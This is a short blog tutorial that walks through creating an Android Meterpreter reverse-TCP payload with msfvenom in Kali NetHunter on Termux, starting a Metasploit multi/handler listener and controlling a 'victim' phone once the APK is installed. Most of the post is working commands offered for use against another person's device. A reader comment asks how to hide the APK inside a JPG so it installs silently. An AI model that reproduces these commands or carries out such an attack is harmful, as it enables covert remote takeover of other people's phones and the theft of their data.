How To Create Android Payload With Metasploit Kali LInux in Android ||



Hii guys welcome you my new post in this post i will show you how can you use Metasploit-Framework in Kali Machine Without Rooted Android Mobile ok so let`s start

1.ok first of all as usual you have to start your Kali GUI in Termux so you type it 


nethunter kex &


2.ok now you can see metasploit-framework is installed in already your non-rooted Kali-machine 




3.ok now you have to create an Android Payload for that you copy this command 
note;-in this iam using my local ip address



msfvenom -p android/meterpreter/reverse_tcp Lhost=192.168.43.196 Lport=4444 R > /home/Linuxndroid.apk

4.ok now you can see that your payload has been successfully created then you have to send on victim mobile but it will work only local network ok




5.ok now you have to open another terminal and type here,


msfconsole


6.after metasploit start you have to apply iy to listening for that you copy this commands



use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.43.196

set lport 4444

exploit




7.now the payload you created is to be install Android mobile 



8.now as you tap on the payload then your connection will be created and your meterpreter session will be opened in metasploit



9.now you can control android mobile you have to type this command to take information of the System


sysinfo


10.now you have to type the help command to use so that all the command will be shown in front of you 




ok guys in this how you can use and create android payload with metasploit in your kali machine so i hope you like this post so see you in the next post Thanks And Love You All 💓
Document
Linuxndroid

Follow Me











Post a Comment

1 Comments

  1. HI,
    kuch iasa tarika hai kya jise hum apk ko jpg file ke sath bind kare and apk automatic run ho jaye without user install kare.. backgroud me?

    ReplyDelete

Please do not enter any spam link in the comment box.